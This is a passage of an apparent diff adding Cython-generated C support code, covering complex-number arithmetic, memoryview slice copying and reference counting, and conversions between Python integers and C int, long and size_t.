__pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + return ::std::complex< double >(x, y); + } + #else + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + return x + y*(__pyx_t_double_complex)_Complex_I; + } + #endif +#else + static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { + __pyx_t_double_complex z; + z.real = x; + z.imag = y; + return z; + } +#endif + +/* Arithmetic */ + #if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) +#else + static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + return (a.real == b.real) && (a.imag == b.imag); + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real + b.real; + z.imag = a.imag + b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real - b.real; + z.imag = a.imag - b.imag; + return z; + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + z.real = a.real * b.real - a.imag * b.imag; + z.imag = a.real * b.imag + a.imag * b.real; + return z; + } + #if 1 + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + if (b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); + } else if (fabs(b.real) >= fabs(b.imag)) { + if (b.real == 0 && b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.imag); + } else { + double r = b.imag / b.real; + double s = (double)(1.0) / (b.real + b.imag * r); + return __pyx_t_double_complex_from_parts( + (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); + } + } else { + double r = b.real / b.imag; + double s = (double)(1.0) / (b.imag + b.real * r); + return __pyx_t_double_complex_from_parts( + (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); + } + } + #else + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + if (b.imag == 0) { + return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); + } else { + double denom = b.real * b.real + b.imag * b.imag; + return __pyx_t_double_complex_from_parts( + (a.real * b.real + a.imag * b.imag) / denom, + (a.imag * b.real - a.real * b.imag) / denom); + } + } + #endif + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex a) { + __pyx_t_double_complex z; + z.real = -a.real; + z.imag = -a.imag; + return z; + } + static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex a) { + return (a.real == 0) && (a.imag == 0); + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex a) { + __pyx_t_double_complex z; + z.real = a.real; + z.imag = -a.imag; + return z; + } + #if 1 + static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex z) { + #if !defined(HAVE_HYPOT) || defined(_MSC_VER) + return sqrt(z.real*z.real + z.imag*z.imag); + #else + return hypot(z.real, z.imag); + #endif + } + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { + __pyx_t_double_complex z; + double r, lnr, theta, z_r, z_theta; + if (b.imag == 0 && b.real == (int)b.real) { + if (b.real < 0) { + double denom = a.real * a.real + a.imag * a.imag; + a.real = a.real / denom; + a.imag = -a.imag / denom; + b.real = -b.real; + } + switch ((int)b.real) { + case 0: + z.real = 1; + z.imag = 0; + return z; + case 1: + return a; + case 2: + return __Pyx_c_prod_double(a, a); + case 3: + z = __Pyx_c_prod_double(a, a); + return __Pyx_c_prod_double(z, a); + case 4: + z = __Pyx_c_prod_double(a, a); + return __Pyx_c_prod_double(z, z); + } + } + if (a.imag == 0) { + if (a.real == 0) { + return a; + } else if ((b.imag == 0) && (a.real >= 0)) { + z.real = pow(a.real, b.real); + z.imag = 0; + return z; + } else if (a.real > 0) { + r = a.real; + theta = 0; + } else { + r = -a.real; + theta = atan2(0.0, -1.0); + } + } else { + r = __Pyx_c_abs_double(a); + theta = atan2(a.imag, a.real); + } + lnr = log(r); + z_r = exp(lnr * b.real - theta * b.imag); + z_theta = theta * b.real + lnr * b.imag; + z.real = z_r * cos(z_theta); + z.imag = z_r * sin(z_theta); + return z; + } + #endif +#endif + +/* MemviewSliceCopyTemplate */ + static __Pyx_memviewslice +__pyx_memoryview_copy_new_contig(const __Pyx_memviewslice *from_mvs, + const char *mode, int ndim, + size_t sizeof_dtype, int contig_flag, + int dtype_is_object) +{ + __Pyx_RefNannyDeclarations + int i; + __Pyx_memviewslice new_mvs = { 0, 0, { 0 }, { 0 }, { 0 } }; + struct __pyx_memoryview_obj *from_memview = from_mvs->memview; + Py_buffer *buf = &from_memview->view; + PyObject *shape_tuple = NULL; + PyObject *temp_int = NULL; + struct __pyx_array_obj *array_obj = NULL; + struct __pyx_memoryview_obj *memview_obj = NULL; + __Pyx_RefNannySetupContext("__pyx_memoryview_copy_new_contig", 0); + for (i = 0; i < ndim; i++) { + if (unlikely(from_mvs->suboffsets[i] >= 0)) { + PyErr_Format(PyExc_ValueError, "Cannot copy memoryview slice with " + "indirect dimensions (axis %d)", i); + goto fail; + } + } + shape_tuple = PyTuple_New(ndim); + if (unlikely(!shape_tuple)) { + goto fail; + } + __Pyx_GOTREF(shape_tuple); + for(i = 0; i < ndim; i++) { + temp_int = PyInt_FromSsize_t(from_mvs->shape[i]); + if(unlikely(!temp_int)) { + goto fail; + } else { + PyTuple_SET_ITEM(shape_tuple, i, temp_int); + temp_int = NULL; + } + } + array_obj = __pyx_array_new(shape_tuple, sizeof_dtype, buf->format, (char *) mode, NULL); + if (unlikely(!array_obj)) { + goto fail; + } + __Pyx_GOTREF(array_obj); + memview_obj = (struct __pyx_memoryview_obj *) __pyx_memoryview_new( + (PyObject *) array_obj, contig_flag, + dtype_is_object, + from_mvs->memview->typeinfo); + if (unlikely(!memview_obj)) + goto fail; + if (unlikely(__Pyx_init_memviewslice(memview_obj, ndim, &new_mvs, 1) < 0)) + goto fail; + if (unlikely(__pyx_memoryview_copy_contents(*from_mvs, new_mvs, ndim, ndim, + dtype_is_object) < 0)) + goto fail; + goto no_fail; +fail: + __Pyx_XDECREF(new_mvs.memview); + new_mvs.memview = NULL; + new_mvs.data = NULL; +no_fail: + __Pyx_XDECREF(shape_tuple); + __Pyx_XDECREF(temp_int); + __Pyx_XDECREF(array_obj); + __Pyx_RefNannyFinishContext(); + return new_mvs; +} + +/* MemviewSliceInit */ + static int +__Pyx_init_memviewslice(struct __pyx_memoryview_obj *memview, + int ndim, + __Pyx_memviewslice *memviewslice, + int memview_is_new_reference) +{ + __Pyx_RefNannyDeclarations + int i, retval=-1; + Py_buffer *buf = &memview->view; + __Pyx_RefNannySetupContext("init_memviewslice", 0); + if (unlikely(memviewslice->memview || memviewslice->data)) { + PyErr_SetString(PyExc_ValueError, + "memviewslice is already initialized!"); + goto fail; + } + if (buf->strides) { + for (i = 0; i < ndim; i++) { + memviewslice->strides[i] = buf->strides[i]; + } + } else { + Py_ssize_t stride = buf->itemsize; + for (i = ndim - 1; i >= 0; i--) { + memviewslice->strides[i] = stride; + stride *= buf->shape[i]; + } + } + for (i = 0; i < ndim; i++) { + memviewslice->shape[i] = buf->shape[i]; + if (buf->suboffsets) { + memviewslice->suboffsets[i] = buf->suboffsets[i]; + } else { + memviewslice->suboffsets[i] = -1; + } + } + memviewslice->memview = memview; + memviewslice->data = (char *)buf->buf; + if (__pyx_add_acquisition_count(memview) == 0 && !memview_is_new_reference) { + Py_INCREF(memview); + } + retval = 0; + goto no_fail; +fail: + memviewslice->memview = 0; + memviewslice->data = 0; + retval = -1; +no_fail: + __Pyx_RefNannyFinishContext(); + return retval; +} +#ifndef Py_NO_RETURN +#define Py_NO_RETURN +#endif +static void __pyx_fatalerror(const char *fmt, ...) Py_NO_RETURN { + va_list vargs; + char msg[200]; +#if PY_VERSION_HEX >= 0x030A0000 || defined(HAVE_STDARG_PROTOTYPES) + va_start(vargs, fmt); +#else + va_start(vargs); +#endif + vsnprintf(msg, 200, fmt, vargs); + va_end(vargs); + Py_FatalError(msg); +} +static CYTHON_INLINE int +__pyx_add_acquisition_count_locked(__pyx_atomic_int_type *acquisition_count, + PyThread_type_lock lock) +{ + int result; + PyThread_acquire_lock(lock, 1); + result = (*acquisition_count)++; + PyThread_release_lock(lock); + return result; +} +static CYTHON_INLINE int +__pyx_sub_acquisition_count_locked(__pyx_atomic_int_type *acquisition_count, + PyThread_type_lock lock) +{ + int result; + PyThread_acquire_lock(lock, 1); + result = (*acquisition_count)--; + PyThread_release_lock(lock); + return result; +} +static CYTHON_INLINE void +__Pyx_INC_MEMVIEW(__Pyx_memviewslice *memslice, int have_gil, int lineno) +{ + __pyx_nonatomic_int_type old_acquisition_count; + struct __pyx_memoryview_obj *memview = memslice->memview; + if (unlikely(!memview || (PyObject *) memview == Py_None)) { + return; + } + old_acquisition_count = __pyx_add_acquisition_count(memview); + if (unlikely(old_acquisition_count <= 0)) { + if (likely(old_acquisition_count == 0)) { + if (have_gil) { + Py_INCREF((PyObject *) memview); + } else { + PyGILState_STATE _gilstate = PyGILState_Ensure(); + Py_INCREF((PyObject *) memview); + PyGILState_Release(_gilstate); + } + } else { + __pyx_fatalerror("Acquisition count is %d (line %d)", + old_acquisition_count+1, lineno); + } + } +} +static CYTHON_INLINE void __Pyx_XCLEAR_MEMVIEW(__Pyx_memviewslice *memslice, + int have_gil, int lineno) { + __pyx_nonatomic_int_type old_acquisition_count; + struct __pyx_memoryview_obj *memview = memslice->memview; + if (unlikely(!memview || (PyObject *) memview == Py_None)) { + memslice->memview = NULL; + return; + } + old_acquisition_count = __pyx_sub_acquisition_count(memview); + memslice->data = NULL; + if (likely(old_acquisition_count > 1)) { + memslice->memview = NULL; + } else if (likely(old_acquisition_count == 1)) { + if (have_gil) { + Py_CLEAR(memslice->memview); + } else { + PyGILState_STATE _gilstate = PyGILState_Ensure(); + Py_CLEAR(memslice->memview); + PyGILState_Release(_gilstate); + } + } else { + __pyx_fatalerror("Acquisition count is %d (line %d)", + old_acquisition_count-1, lineno); + } +} + +/* CIntFromPy */ + static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(int) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(int) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(int) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(int) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(int), + little, !is_unsigned); + } +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* CIntFromPy */ + static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const size_t neg_one = (size_t) -1, const_zero = (size_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(size_t) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(size_t, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (size_t) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 2 * PyLong_SHIFT)) { + return (size_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 3 * PyLong_SHIFT)) { + return (size_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 4 * PyLong_SHIFT)) { + return (size_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(size_t) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(size_t) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) ((((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return 